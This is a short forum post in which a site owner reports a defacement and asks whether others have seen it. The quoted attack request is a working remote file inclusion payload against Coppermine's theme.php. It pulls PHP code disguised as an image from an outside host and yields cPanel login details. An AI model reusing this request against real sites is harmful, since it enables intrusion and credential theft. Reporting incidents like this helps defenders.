hey,
I run a website www.dustify.net. Last night someone has used coppermine to execute a php script to deface the front page of the website by accessing the postnuke username/password.
"http://www.dustify.net/modules/coppermine/themes/default/theme.php?THEME_DIR=http://www.webfontes.com.br/priv8/cmd.gif?&nick=MaMa&op=coppermine"
is the request that was put through our webserver. The error is in "http://www.dustify.net/modules/coppermine/themes/default/theme.php" and the file "http://www.webfontes.com.br/priv8/cmd.gif" is not an image, it contains PHP code to break into several security flaws in several image galleries.
The result of executing the script is:
"PossÃvel Login cPanel: **** PossÃvel Senha: ****
Admins:
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in http://www.webfontes.com.br/priv8/cmd.gif?/user_list_info_box.inc on line 251
Site Ownado!"
Has anyone else had this problem?
Sorry, but: http://forum.coppermine-gallery.net/index.php?topic=2553.0